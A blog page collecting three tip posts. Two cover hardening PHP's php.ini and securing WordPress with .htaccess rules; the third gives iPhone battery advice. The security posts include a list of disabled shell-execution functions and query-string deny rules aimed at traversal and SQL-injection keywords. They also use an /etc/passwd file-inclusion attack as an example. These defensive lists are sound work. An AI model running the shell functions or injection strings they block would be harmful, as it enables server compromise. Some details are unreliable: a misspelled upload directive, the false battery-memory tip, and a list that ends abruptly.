Blog

Tips Category

PHP Hardening & Security

Posted on 11 Dec 2014 In: Blog, Tips

Hardening Patch for PHP – The Suhosin Hardening-Patch for PHP provides low-level protections that cannot be implemented with an extension such as Zend-created vulnerabilities and PHP core vulnerabilities such as buffer overflows and format string vulnerabilities. Consequently, the patch is PHP version-specific.

Suhosin Extension – The Suhosin Extension contains the bulk of suhosin’s protection features. It’s focus is to protect from code-level vulnerabilities and hacker tricks. It is not PHP version-specific. From PHP 5.4 on words Suhosin is available as a extension and can be downloaded here

 

Hardening PHP Application

Read here to know more about security measures on php application

 

 

Hardening PHP from php.ini

PHP’s default configuration file, php.ini (usually found in /etc/php.ini on most Linux systems) contains a host of functionality that can be used to help secure your web applications. Unfortunately many PHP users and administrators are unfamiliar with the various options that are available with php.ini and leave the file in it’s stock configuration. By utilizing a few of the security related options in the configuration file you can greatly strengthen the security posture of web applications running on your server.

Safe Mode

PHP safe mode is a comprehensive “attempt to solve the shared server security problem” that includes many useful features. Note that safe mode support is being removed in PHP 6. Safe mode effectively checks if functions in one file on the server that affect other files all have the same ownership. For instance, if you have a page script1.php that attempts to read the contents of a directory img/. Safe mode with check the UID of script1.php and the img/ directory. If they match then the script will be allowed access, if they don’t match then safe mode will disable access. This is an interesting security mechanism that allows you to restrict access by scripts outside of the normal application installation directory. Safe mode may cause problems though when the web server ends up owning files (for instance when a new file is uploaded or created by an application it is usually owned by ‘apache’ or a similar web server account).

Safe mode will also restrict executables that may be run by scripts in the same way it restricts file and directory access. Safe mode can also be configured so that only executables in a certain directory can be run. This can help limit exposure of shell commands to certain scripts.

To enable safe mode, alter (or add) the safe mode directive in the php.ini to:

 

safe_mode = On

 

In some cases you’ll want to use a group to check ownership (for instance in the case that you have multiple people deploying web application scripts). To have safe mode check group permissions use:

 

safe_mode_gid = On

 

If you want to limit directories that can contain included files or executables use the following php.ini directives respectively:

 

safe_mode_include_dir = /path/to/dir
safe_mode_exec_dir = /path/to/exec/dir

 

Safe mode has several other useful features that are worth looking into. Browse the documentation at the PHP website and see if safe mode is right for your environment.

Restricting Includes

Using the open_basedir directive in PHP makes a lot of sense given most file include vulnerability vectors. This directive limits all PHP file operations to the listed directory and below. It is common for attackers to search for ways to include local files in PHP scripts to expose local filesystem files through the web server. For instance, if an attacker found a file inclusion vulnerability they might try to include the /etc/passwd file to enumerate all the user accounts on the system. With the open_basedir directive PHP can restrict file inclusion to the web root, for instance /var/www. Once set files outside that directory cannot be included in scripts, and thus the aforementioned attack would fail. To enable the open_basedir directive update your php.ini file to include:

 

open_basedir = /path/to/web/root

 

Disabling Functionality

There are certain functions in PHP that you probably don’t want your developers to use because of the danger they pose. Even if you know your users aren’t utilizing certain functions it is wise to completely disable them so an attacker can’t use them. This security precaution is especially effective at stopping an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or even include a remote PHP file. By disabling functionality you ensure that you can limit the effectiveness of these types of attacks. It should be noted that it is virtually impossible to do something like preventing an attacker from executing a command at a shell by disabling functions, but it can certainly stop an attacker who isn’t a skillful PHP programmer.

By disabling functions like shell_exec() and system() you can prevent users and attackers from utilizing these functions. It is important to restrict functionality for developers because use of these command opens the potential for a remote code execution vulnerability if not utilized with great care. There are certainly cases for operations such as executing a command at a shell, but PHP provides a drove of functions that are essentially the same. Developers can standardize on one such function and the rest can be disabled to help prevent attacks. While this isn’t a foolproof solution it will probably prevent attacks like the dreaded c99 shell. To enable the disable_functions directive simply add it to your php.ini with a comma separated list of functions you want to restrict. For instance:
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo

 

Preventing Information Disclosure

Attackers will often use information that your web server exposes in order to gain information about the server configuration, application layout, and components. Error messages are some of the most common paths to information disclosure, often leaking information such as application installation path, database connectivity, data model details such as table and column names, and script details such as variables. While this debugging information is invaluable to developers it is useless to end users and dangerous to expose to attackers. PHP debugging output should be disabled in the php.ini using:

 

display_errors = Off

 

This prevents PHP from showing run time errors in pages served to users. PHP will continue to log the errors as normal, however, so they can be reviewed by developers. Be wary of developer tactics to end run PHP errors, however, as disabling this functionality does not prevent information disclosure. Some developers may use custom debugging output nested in HTML comments, third party tools like FirePHP, or writing PHP error logs to local directories using .htaccess files and the error_log directive. However, by preventing the display of errors by default you reduce the possibility of exposing information to attackers.

Disable Globals

Global variables are a horrible hold over from the PHP 3 days. In most distributions register global variables is set to off (and thankfully it won’t be supported in future versions of PHP). However, you should ensure that the directive is properly in place. You should find the following in your php.ini file:

 

register_globals = Off

 

Register globals allows various HTTP variables to be used without specifying their source. For instance, if a developer wants to use a URL variable named ‘id’, for instance from the URL request index.php?id=4, with globals they can simply use $id rather than $_GET[‘id’]. This is a great convenience but it can cause collisions. For instance, if a form post uses a variable called ‘id’ and there is a variable $id defined in a script and a user alters the URL of the script to include an ‘id=’ in the URL which variable has precedence? Even more damaging is the ability of attackers to override configuration variables such as DOCUMENT_ROOT from the URL. This can cause no end of problems, especially if attackers are able to call scripts that are normally included in other scripts and expect predefined variables, which could be overwritten via GET variables by an attacker.

Many legacy applications may require globally registered variables. If this is the case at least limit the configuration to specific application directories rather than throughout your PHP installation. You can do this using PHP directives in .htaccess files included in specific directories. Ensure that register_globals is set to Off, however, in your php.ini configuration!

Disable Remote File Includes

Attackers will often attempt to identify file inclusion vulnerabilities in applications then use them to include malicious PHP scripts that they write. Even if an attacker doesn’t have write access to the web application directories if remote file inclusion is enabled the attacker can host malicious PHP scripts on other servers and the web application will fetch them and execute them locally! This can have devastating consequences. To restrict remote file execution be sure the following appears in your php.ini file:

 

allow_url_fopen = Off
allow_url_include = Off

 

This prevents remote scripts from being included and executed by scripts on your system.

Restrict File Uploads

If you’re not utilizing file upload functionality in any of your PHP scripts then it’s a good idea to turn it off. Attackers will attempt to (mis)use file uploads to quickly inject malicious scripts into your web applications. By disabling file uploads altogether this makes moving scripts onto your web server more difficult. To disable file uploads change the file_uploads directive in your php.ini to read:

 

file_uploads = Off

 

Even if you do allow file uploads you should change the default temporary directory used for file uploads. This can be done by changing the upload_tmp_dir directive. You may also want to restrict the size of files that can be uploaded. This is usually more of a system administration alteration than a security fix, but it can be useful. Use the upload_max_filesize directive for this purpose. To restrict upload directories and file sizes change your php.ini so that it reads:

 

upload_tmp_dir = /var/php_tmp
upload_max_filezize = 2M

 

Protect Sessions

Session stealing is a popular attack that allows a malicious user to hijack the session of a legitimate user. Using session hijacking an attacker can bypass authorization and access portions of web applications without authorization. PHP uses strong (meaning long pseudo randomly generated) session identifiers so that guessing a session id is extremely difficult. When logging into a PHP application you can view your cookies and likely identify a cookie with an name like ‘phpsessid’ and a value similar to ‘bbbca6bb7a23bdc8de3baef2b506e654’. The cookie is composed of 32 hexadecimal characters, making it extremely hard to predict. The flaw in this system, however, is that these session identifiers are written to the filesystem when they’re created so PHP can keep track of them. Changing the default location of these session identifiers will confound some attempts to read them. To change the location where session information is written alter the session.save_path in the php.ini configuration so that it points to your desired location like so:

 

session.save_path = /var/lib/php

 

Make sure that the web server can read and write to the location you specify, however, or sessions won’t work. You may also wish to set PHP so that it writes cookies in such a way that they are inaccessible to JavaScript. If you don’t have any PHP applications that utilize JavaScript to manipulate cookies this is a great idea. Attackers will often exploit Cross Site Scripting (XSS) flaws in web applications to inject JavaScript into pages, which could be used to steal session cookies. By setting the php.ini directive:

 

session.cookie_httponly = 1

 

you restrict JavaScript from accessing your cookies. Another small security feature is allowing PHP to check HTTP referer values so that session information is only passed internally while a user is viewing an application. This prevents users from accidentally publishing session information in a way that would allow external users to follow links and steal a session. This is especially useful if session information is being passed in a URL that could accidentally be published to a mailing list or web site. To enable this functionality use the following in your php.ini:

 

session.referer_check = your_url.tld

 

For more information about session security see http://devzone.zend.com/manual/ref.session.html.

 

Conclusions

Implementing these security features within your PHP configuration isn’t a recipe for complete security, but it does increase the overall security posture of your web applications. By combining these measures with others, such as Suhosin and an intrusion detection system like OSSEC you incrementally increase the security of your server and web applications. You must be careful to implement configurations that restrict functionality that could be used to the detriment of your installation but not to restrict developers. Frustrating developers is a sure fire recipe for home grown solutions to end run your restrictions and invariably these solutions weaken the overall security of your server and often introduce vulnerabilities. Take care to harden your servers as much as possible, but don’t become over zealous. Beginning the process of server hardening with your php.ini configuration is a great step as it affects all the PHP web applications installed on the server and can be applied incrementally. Remember to restart your web server after making changes to the php.ini file so that those changes are put into effect.

 

Source: http://www.madirish.net/199

 

WordPress Security Tutorial

Posted on 11 Dec 2014 In: Blog, Tips

I have been revisiting the various security settings of my WordPress blog after the sudden database table corruption of this blog for unknown reason last week. In this post I have highlighted some of the security tips that can help protect your blog from possible outside attacks.

blog_security_128_2

 

Protect your WordPress Admin Area

It is important to restrict the access to your WordPress admin area only to people that actually need access to it. If your site does not support registration or front-end content creation, your visitors should not be able to access your /wp-admin/ folder or the wp-login.php file. The best you can do is to get our home IP address (you can use a site like whatismyip.com for that) and add these lines to the .htaccess file in your WordPress admin folder replacing xx.xxx.xxx.xxx with your IP address.

<Files wp-login.php>
order deny,allow
Deny from all
Allow from xx.xxx.xxx.xxx
</Files>

In case you want to allow access to multiple computers (like your office, home PC, laptop, etc.), simply add another Allow from xx.xxx.xxx.xxx statement on a new line.

If you want to be able to access your admin area from any IP address (for example, if you often rely on free Wi-Fi networks) restricting your admin area to a single IP address or to few IPs can be inconvenient. In such cases we recommend that you limit the number of incorrect login attempt to your site. This way you will protect your WordPress site from brute-force attacks and people trying to guess your password. For such purposes, you can use a nice little plugin called Limit login attempts.

Don’t use the “admin” username

Most of the attackers will assume that your admin username is “admin”. You can easily block a lot of brute-force and other attacks simply by naming your admin username differently. If you’re installing a new WordPress site, you will be asked for username during the WordPress installation process. If you already have a WordPress site, you can follow the instructions in our tutorial on how to change your WordPress username.

Use strong passwords

You will be surprised to know that there are thousands of people that use phrases like “password” or “123456” for their admin login details. Needles to say, such passwords can be easily guessed and they are on the top of the list of any dictionary attack. A good tip is to use an entire sentence that makes sense to you and you can remember easily. Such passwords are much, much better than single phrase ones.

Consider two-factor authentication

Enabling two-factor authentication for your WordPress website will significantly improve the security of your website. One of the easiest ways to do this is to use Google 2 factor authentication or Clef to authenticate using your mobile phone. For all SiteGround users, Clef authors have created an ad-free version of their plugin. Check out our Clef tutorial for more information on that matter.

Make sure you’re site is on a secured WordPress hosting

Your WordPress site is as secured as your hosting account. If someone can exploit a vulnerability in an old PHP version for example or other service on your hosting platform it won’t matter that you have the latest WordPress version. This is why it is important to be hosted with a company that has security as a priority. Some of the features that you should look for are:

  • Support for the latest PHP and MySQL versions
  • Account isolation
  • Web Application Firewall
  • Intrusion detecting system

Ensure your computer is free of viruses and malware

If your computer is infected with virus or a malware software, a potential attacker can gain access yo your login details and make a valid login to your site bypassing all the measures you’ve taken before. This is why it is very important do have an up-to-date antivirus program and keep the overall security of all computers you use to access your WordPress site on a high level.

Use Strong Passwords for all Entry Points

I was surprised to find out how many of my friends use the WordPress admin password generated by WordPress during install time and thinks that their blog is protected from attacks as they are using a strong password! The WordPress admin password generated during install time is normally pretty strong (consists lowercase and uppercase letters with numbers and symbols) so there is nothing wrong with that. I was mainly shocked to find out that their ftp/cPanel password for that domain is not that strong. It gets even better… one of them were using his partners name as the password (Did I mention that his partner’s name was mentioned on his blog’s ‘About’ page?)! The ftp/cPanel password for your domain is equally important. If someone can access your cPanel then that person can delete your WordPress database from the cPanel->Databases->MySQL Databases. Anyway, the bottom line is to use strong passwords for all entry points not just one.

Add a CAPTCHA on your WordPress Login page

Adding a simple captcha to your WordPress login page is another great way to minimize the chance of a bot/script gaining access to your site via a brute force attack. Its recommended to add Googles Recaptcha for WP https://www.google.com/recaptcha/intro/index.html

Protect the ‘wp-admin’ Directory

Use a .htaccess file in the ‘wp-admin’ directory to limit access to only certain IP addresses (your home, work etc). The WordPress htaccess tips post has more htaccess related tips and tricks. Below is an example .htaccess file that can be used for this purpose (replace ‘x’ and ‘y’ with your IP address)

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName “Access Control”
AuthType Basic
order deny,allow
deny from all
# whitelist home IP address
allow from xxx.xxx.xxx.xxx
# whitelist work IP address
allow from yy.yyy.yyy.yyy

If you don’t have static IP addresses then the above method can be a bit hard to implement. In that case you could the use of AskApache Password ProtectWordPress plugin. The ‘AskApache Password Protect’ plugin adds good password protection to your WordPress Blog. Use the Login Lockdown feature of the all in one WP Security Plugin to protect your blog against brute force attack (a brute force attack is a method of defeating a cryptographic scheme by systematically trying a large number of possibilities)

Deny access to your Plugins and other directories

A lot of bloggers don’t protect access to their WordPress plugins directory. What I mean by this is that if you go to the www.your-domain.com/wp-content/plugins/ from a browser it shows all the plugins that you are using. Many wordpress plugins can have vulnerabilities which the attacker can use to harm your blog. So, its a good idea to block access to these directories. You can use a .htaccess file or just upload a blank ‘index.html’ file to that directory to block access to these directories. (download a blank index.html)

Update WordPress to the Latest Release

As new WrodPress versions are released the security bugs for previous release becomes public information. WordPress could have vulnerabilities as a result of how the program is written that allow an attacker to pass HTTP arguments, bad URI strings, form input, etc, that could cause Bad Things to happen. So always upate your WordPress to the latest version to make sure that you are protected against any known security bugs.

Don’t Show WordPress Version on Your Blog

You should not make the WordPress version that you are using visible to others for the same reason explained above. The specific WordPress version that you are using can give the attacker an upper hand in finding a way to break in.

Backup Your Data

I can’t stress this enough… always keep backups of all the important files. I always backup my WordPress Database and WordPress files in case of emergency. Read my what would you do if you lost all your blog’s content article to find out how backups can help you sleep better at night :)

Be careful when you upload something to your site

When you upload a script (example: a plugin, a theme or just a normal script) to your site you need to be extra careful as it can harm your site if it was designed to do so. Only upload authentic content to your site. Never download a plugin or a theme from a warez or torrent or file sharing sites. The content on these sites can be disguised as a plugin or a theme but it will harm your site when uploaded to your server. You can read more on these types of attack from the free premium plugin and theme downloaders beware article.

 

Advanced WordPress Security Tips

However, if you are in the mood for some advanced tweaking then the following security tips should come in handy ;)

NOTE and DISCLAIMER

Most of these techniques require you to understand what you are doing.

It is strongly recommended that you first test these techniques on a test or development site before applying them to your live site. Doing some of the tips suggested here can break your site if not performed correctly.

We take no responsibility for any mishaps as a result of your efforts in applying the techniques discussed in this article.

Also note that these techniques assume that your WordPress installation is running Apache and you have mod_alias and mod_rewrite installed.

1. Disable HTTP Trace Method

There is a security attack technique called Cross Site Tracing (XST) which can be used together with another attack mechanism called Cross Site Scripting (XSS) which exploits systems which have HTTP TRACE functionality. HTTP TRACE is a default functional feature on most webservers and is used for things like debugging. Hackers who use XST will usually steal cookie and other sensitive server information via header requests.

You can disable the trace functionality either via your Apache configuration file or by putting the following in your .htaccess file:

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

2. Remove header outputs from your WordPress installation

WordPress can often add quite a lot of output in your header pertaining to various services. The following code shows how you can remove a lot of this output.

Warning: This can break some functionality if you are not careful. Eg, if you’re using RSS feeds then you may want to comment that line out.

Add the following code to your theme’s functions.php file:

remove_action('wp_head', 'index_rel_link');
remove_action('wp_head', 'feed_links', 2);
remove_action('wp_head', 'feed_links_extra', 3);
remove_action('wp_head', 'rsd_link');
remove_action('wp_head', 'wlwmanifest_link');
remove_action('wp_head', 'parent_post_rel_link', 10, 0);
remove_action('wp_head', 'start_post_rel_link', 10, 0);
remove_action('wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0);
remove_action('wp_head', 'wp_generator');
remove_action('wp_head', 'wp_shortlink_wp_head', 10, 0);
remove_action('wp_head', 'noindex', 1);

3. Deny comment posting via proxy server

You can reduce spam and general proxy requests by attempting to prevent comments which are posted via a proxy server. Use the code below (compliments of perishablepress.com) in your .htaccess file:

RewriteCond %{REQUEST_METHOD} =POST
RewriteCond %{HTTP:VIA}%{HTTP:FORWARDED}%{HTTP:USERAGENT_VIA}%{HTTP:X_FORWARDED_FOR}%{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}%{HTTP:HTTP_PC_REMOTE_ADDR}%{HTTP:HTTP_CLIENT_IP} !^$
RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
RewriteRule .* - [F,NS,L]

4. Change your default WordPress DB prefix

You may already be aware that WP uses a default prefix value of “wp_” for the DB tables. This can in turn be used by malicious bots and hackers to guess your DB table names.

In general, changing your WP DB prefix value is much easier to do at installation time because you can set it in your wp-config.php file.

Conversely if you already have a live WP site and you wish to change your DB prefix, then the procedure is a little more complicated.

A basic guide for changing the DB prefix after an install for those who are curious is briefly outlined below:

1) Do a full DB backup and save the backup somewhere offboard. Using something like BackupBuddy can useful.
2) Do a complete dump of your WP DB using PHPMyAdmin into a text file and save 2 copies – one for editing and the other as an original just in case.
3) Using a good code editor, replace all instances of “wp_” with your own prefix.
4) From your WP admin panel, deactivate all plugins
5) Using PHPMyAdmin, drop your old DB and import your new one using the file you edited in step 3.
6) Edit your wp-config.php file with the new DB prefix value.
7) Re-activate your WP plugins
8) Perform another save on your permalink settings by going to Settings->Permalinks in order to refresh your permalink structure.

Caution:

Sometimes plugins add their own prefix after the wordpress prefix where both are identical.

example, you might have a table name from a certain plugin has a name like the following: wp_wp_abc_table_name.

Be sure when replacing the “wp_” instances in step 2 above that you only replace the first “wp_” prefix and not the one following it.
For instance if we take the example we just mentioned we would replace the first prefix with our new prefix which for this example might be called “trx_”.

The new name would look like:

trx_wp_abc_tablename

Note that there are also WP plugins out there which can achieve the above steps for those who are not prepared to get their hands dirty.

5. Deny Potentially Dangerous Query Strings

You can put the following code in your .htacces file to help prevent XSS attacks.

BEWARE: Functionality of some plugins or themes could break if you are not careful to exclude strings which are used by them.

# QUERY STRING EXPLOITS
<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} ../ [NC,OR]
RewriteCond %{QUERY_STRING} boot.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag= [NC,OR]
RewriteCond %{QUERY_STRING} ftp: [NC,OR]
RewriteCond %{QUERY_STRING} http: [NC,OR]
RewriteCond %{QUERY_STRING} https: [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
RewriteCond %{QUERY_STRING} ^.*([|]|(|)|<|>|'|"|;|?|*).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%22|%27|%3C|%3E|%5C|%7B|%7C).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|config|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>

6. Apply PHP hardening to your system

You can install and enable Suhosin which is a PHP hardening system on your server. This can further increase the security of your system by protecting against various vulnerabilities.

Suhosin typically installs on most PHP installations and is sometimes included by webhosting companies by default. (Check with your hosting provider)

If you can read more about Suhosin here.

 

Further reading: http://codex.wordpress.org/Hardening_WordPress

 

Source:

https://www.tipsandtricks-hq.com/advanced-wordpress-security-tips-4659
https://www.tipsandtricks-hq.com/essential-wordpress-security-tips-is-your-blog-protected-987

 

22 Tips to Extend iPhone Battery Life

Posted on 24 Oct 2014 In: Blog, Tips

Anyone who’s used an iPhone for even a few days has discovered that while these phones are more powerful, and more fun, than perhaps any other cell or smart phone, that fun comes with a price: battery use. Any halfway intensive iPhone user will recharge their phone almost every couple of days.

There are ways to conserve iPhone battery life, but many of them involve turning off services and features, which makes it a choice between all the cool things that the iPhone can do and having enough juice to do them.

Here are 20 tips to help you extend your iPhone’s power, including new tips for iOS 8, which has features that can drain battery faster than earlier versions.

You don’t need to follow all of them (what fun would that be?)—just use the ones that make sense for how you use your iPhone—but following some will help you conserve juice.

adjusting auto-brightness on phone -

1. Turn on Auto-Brightness

The iPhone has an ambient light sensorthat adjusts the brightness of the screen based on the light around it (darker in dark places, brighter when there’s more ambient light) to both save battery and make it easier to see. Turn Auto-Brightness on and you’ll save energy because your screen will need to use less power in dark places.

Adjust that setting by tapping:

  1. The Settings app
  2. Display & Brightness (it’s called Brightness & Wallpaper in iOS 7)
  3. Move the Auto-Brightness slider to On/green
iphone battery life: screen brightness -

2. Reduce Screen Brightness

You can control the default brightness of your iPhone screen with this slider. Needless to say, the brighter the default setting for the screen, the more power it requires. Keep the screen dimmer to conserve more of your battery by tapping:

  1. The Settings app
  2. Display & Brightness (it’s called Brightness & Wallpaper in iOS 7)
  3. Move the slider as needed
reduce motion and animation in iOS 7 -

3. Stop Motion & Animations (iOS 7)

One of the coolest features of iOS 7 is called Background Motion. It’s subtle, but if you move your iPhone and watch the app icons and background image, you’ll see them move slightly independently of each other, as if they’re on different planes. This is called a parallax effect. It’s really cool, but it also drains battery. You may want to leave it on to enjoy the effect, but if not, turn it off by tapping:

  1. The Settings app
  2. General
  3. Accessibility
  4. Reduce Motion
  5. Move slider to green/On
iOS 7 battery: Dynamic Backgrounds -

4. Disable Dynamic Backgrounds (iOS 7)

Another neat feature introduced in iOS 7 is animated wallpapers that move underneath your app icons. These dynamic backgrounds offer a cool interface flourish, but they also use more power than a simple static background image. Dynamic Backgrounds aren’t a feature you have to turn on or off, just don’t select the Dynamic Backgrounds in theWallpapers & Backgrounds menu.
iphone battery extend: bluetooth -

5. Turn Bluetooth Off

Bluetooth wireless networking is especially useful for cell phone users with wireless headsets or earpieces. But transmitting data wirelessly takes battery and leaving Bluetooth on to accept incoming data at all times requires even more juice. Turn offBluetooth except when you’re using it to squeeze more power from your battery.

Find it in:

  1. The Settings app
  2. Bluetooth
  3. Move slider to Off/white

You can also access the Bluetooth setting through Control Center. To do that, swipe up from the bottom of the screen and tap the Bluetooth icon (the center one) so that it is grayed out.

iphone battery life: turn off cellular data -

6. Turn Off LTE or Cellular Data

The nearly perpetual connectivity offered by the iPhone means connecting to 3G and speedy 4G LTE cellular phone networks. Not surprisingly, using 3G, and especially 4G LTE, requires more energy to get the quicker data speeds and higher-quality calls. It’s tough to go slower, but if you need more power, turn off LTEand just use the older, slower networks. Your battery will last longer (though you’ll need it when you’re downloading websites more slowly!) or turn off all cellular data and either just use Wi-Fi or no connectivity at all.

To do this:

  1. Tap Settings
  2. Cellular
  3. Slide Enable LTE to Off/white to use slower cellular data networks while still allowing yourself to use cellular data
  4. To limit yourself just to Wi-Fi, slide Cellular Data to Off/white
iphone battery extend: turn off wi-fi -

7. Keep Wi-Fi Off

The other kind of high-speed network that the iPhone can connect to is Wi-Fi. Wi-Fi is even faster than 3G or 4G, though it’s only available where there’s a hotspot (not virtually everywhere like 3G or 4G). Keeping Wi-Fi turned on at all times in hopes that an open hotspot will appear is a sure way to drain your battery life. So, unless you’re using it right this second, keep Wi-Fi turned off by tapping:

  1. The Settings app
  2. Wi-Fi
  3. Slide to Off/white

You can also turn off Wi-Fi via Control Center. To access that setting, swipe up from the bottom of the screen and tap the Wi-Fi icon to gray it out.

iphone battery performance: turn off location services -

8. Turn Off Location Services

One of the coolest features of the iPhone is its built-in GPS. This allows your phone to know where you are and give you exact driving directions, give that information to apps that help you find restaurants, and more. But, like any service that sends data over a network, it needs battery power to work. If you’re not using Location Services, and don’t plan to right away, turn them off and save some power.

Turn off Location Services by tapping:

  1. The Settings app
  2. Privacy
  3. Location Services
  4. Slide to Off/white
system services settings -

9. Turn Off Other Location Settings

The iPhone can perform a lot of useful tasks in the background, but the more background activity there is, especially activity that connects to the Internet or uses GPS, can drain battery quickly. Some of these features in particular are not required by most iPhone users and can be safely turned off to regain some battery life.

Find them in:

  1. The Settings app
  2. Privacy
  3. Location Services
  4. System Services
  5. Turn off Diagnostics & Usage,Location-Based iAds, Popular Near Me, and Setting Time Zone.
iOS 7 battery issues: background app refresh -

10. Prevent Background App Refresh (iOS 7)

There are a number of new features in iOS 7 designed to make your iPhone smarter and ready for you whenever you need it. One of these features is Background App Refresh. This feature looks at the apps you use most often, the time of day that you use them, and then automatically updates them for you so that the next time you open the app, the latest information is waiting for you. For instance, if you always check social media at 7:30 am, iOS 7 learns that and automatically updates your social apps before 7:30 am. Needless to say, this useful feature drains battery.

To turn it off, tap:

  1. The Settings app
  2. General
  3. Background App Refresh
  4. Either disable the feature entirely or just for for specific apps that you want to use it with

 

Automatic app updates in iOS 7 -

11. Don’t Automatically Update Apps (iOS 7)

If you’ve got iOS 7, you can forget needing to update your apps by hand. There’s now a feature that automatically updates them for you when new versions are released. Convenient, but also a drain on your battery. To only update apps when you want to, and thus manage your power better:

  1. Tap the Settings app
  2. iTunes & App Store
  3. In the Automatic Downloadssection, find Updates
  4. Move slider to Off/white
iphone battery: turn off data push -

12. Turn Data Push Off

The iPhone can be set to automatically suck email and other data down to it or, for some kinds of accounts, have data pushed out to it whenever new data becomes available. You’re probably realized by now that accessing wireless networks costs you energy, so turning data push off, and thus reducing the number of times your phone connects to the network, will extend your battery’s life. With push off, you’ll need to set your email to check periodically or do it manually (see the next tip for more on this).

Find it in:

  1. The Settings app
  2. Mail, Contacts, Calendar
  3. Fetch New Data
  4. Push
  5. Slide to Off/white
iphone battery performance: fetch data less -

13. Fetch Email Less Often

The less often your phone accesses a network, the less battery it uses. Save battery life by setting your phone tocheck your email accounts less often. Try checking every hour or, if you’re really serious about saving battery, manually. Manual checks means you’ll never have email waiting for you on your phone, but you’ll also stave off the red battery icon.

Change your Fetch settings by tapping:

  1. The Settings app
  2. Mail, Contacts, Calendar
  3. Fetch
  4. Select your preference (the longer between checks, the better for your battery)
iphone battery life: auto-lock sooner -

14. Auto-Lock Sooner

You can set your iPhone to automatically go to sleep – a feature known as Auto-Lock – after a certain amount of time. The sooner it sleeps, the less power is used to run the screen or other services. Try setting Auto-Lock to 1 or 2 minutes.

Change the setting in:

  1. The Settings app
  2. General
  3. Auto-Lock
  4. Tap your preference (the shorter, the better)
iphone battery: turn off equalizer -

15. Turn off Equalizer

The iPod app on the iPhone has anEqualizer feature that can adjust music to increase bass, decrease treble, etc. Because these adjustments are made on the fly, they require extra battery. Turn the equalizer off to conserve battery. This means you’ll have a slightly modified listening experience – the power savings might not be worht it to true audiophiles – but for those hoarding battery power, it’s a good deal.

Find it in:

  1. The Settings app
  2. Music
  3. EQ
  4. Tap off
save iphone battery: turn off hotspot -

16. Make Sure Personal Hotspot Is Off

This only applies if you use the iPhone’s Personal Hotspot feature to share your wireless data connection with other devices. But if you do that, this tip is key.

Personal Hotspot turns your iPhone into a wireless hotspot that broadcasts its cellular data to other devices within in range. This is a tremendously useful feature, but as you may have guessed if you’ve read this far, it also really drains your battery. That’s an acceptable trade when you’re using it, but if you forget to turn it off when you’re done, you’ll be surprised at how quickly your battery drains.

To make sure you turn off Personal Hotspot when you’re done using it:

  1. Tap the Settings app
  2. Personal Hotspot
  3. Move slider to off/white
Battery usage in iOS 8 -

17. Find the Battery Killers (iOS 8)

Most of the suggestions on this list are about turning things off or not doing certain things. This one helps you discover which apps are killing your battery. In iOS 8, there’s a new feature called Battery Usage that shows which apps have been sucking the most power over the last 24 hours and the last 7 days. If you start seeing an app showing up there consistently, you’ll know that running the app is costing you battery life.

Access Battery Usage by tapping:

  1. The Settings app
  2. General
  3. Usage
  4. Battery Usage

On that screen, you’ll sometimes see notes beneath each item (for instance, in the screenshot, notice “Low Signal” under Personal Hotspot). This note provides more detail on why the app drained so much battery and can suggest ways for you to fix it.

Suggested Apps in iOS 8 -

18. Don’t Take App Suggestions (iOS 8)

Suggested Apps is another new feature of iOS 8 that uses your location information to figure out where you are, what you’re near, and what apps—both installed on your phone and available in the App Store—might come in handy based on that information. It can be neat, but needless to say, it uses extra battery life by checking for your location, communicating with the App Store, etc.

To turn off suggested apps:

  1. Tap the Settings app
  2. Tap General
  3. Tap Handoff & Suggested Apps
  4. Move the My Apps and App Storesliders to Off
killing apps doesn't save battery life -

19. One Common Mistake: Quitting Apps Doesn’t Save Battery

When you talk about tips for saving battery life on your iPhone, perhaps the most common one that comes up is quitting your apps when you’re done with them, rather than letting them run in the background.

This is wrong. In fact, regularly quitting your apps in that way can actually make your battery drain faster. So, if saving battery life is important to you, don’t follow this bad tip.

For more about why this can do the opposite of what you want, read this.

let iphone battery run down to save life -

20. Run Down Your Battery As Much As Possible

Believe it or not, but the more often you charge a battery, the less energy it can hold. Counter-intuitive, I know, but it’s one of the quirks of modern batteries.

Over time, the battery remembers the point in its drain at which you recharge it and starts to treat that as its limit. For example, if you always charge your iPhone when it’s still got 75% of its battery left, eventually the battery will start to behave as if it’s total capacity is 75%, not the original 100%.

The way to get around your battery losing capacity in this way is to use your phone as long as possible before charging it. Try waiting until your phone is down to 20% (or even less!) battery before charging. Just make sure not to wait too long.

mophie Juice Pack iphone extended battery - image copyright mophie

mophie Juice Pack Plus. image copyright mophie

21. Buy an Extended Life Battery

If all else fails, just get more battery. A few accessory makers like mophie and Kensington offer extended life batteries for the iPhone. If you need so much battery life that none of these tips help you enough, an extended life battery is your best bet. With one, you’ll get days more standby time and many hours more use.

22. Do Less-Battery-Intensive Things

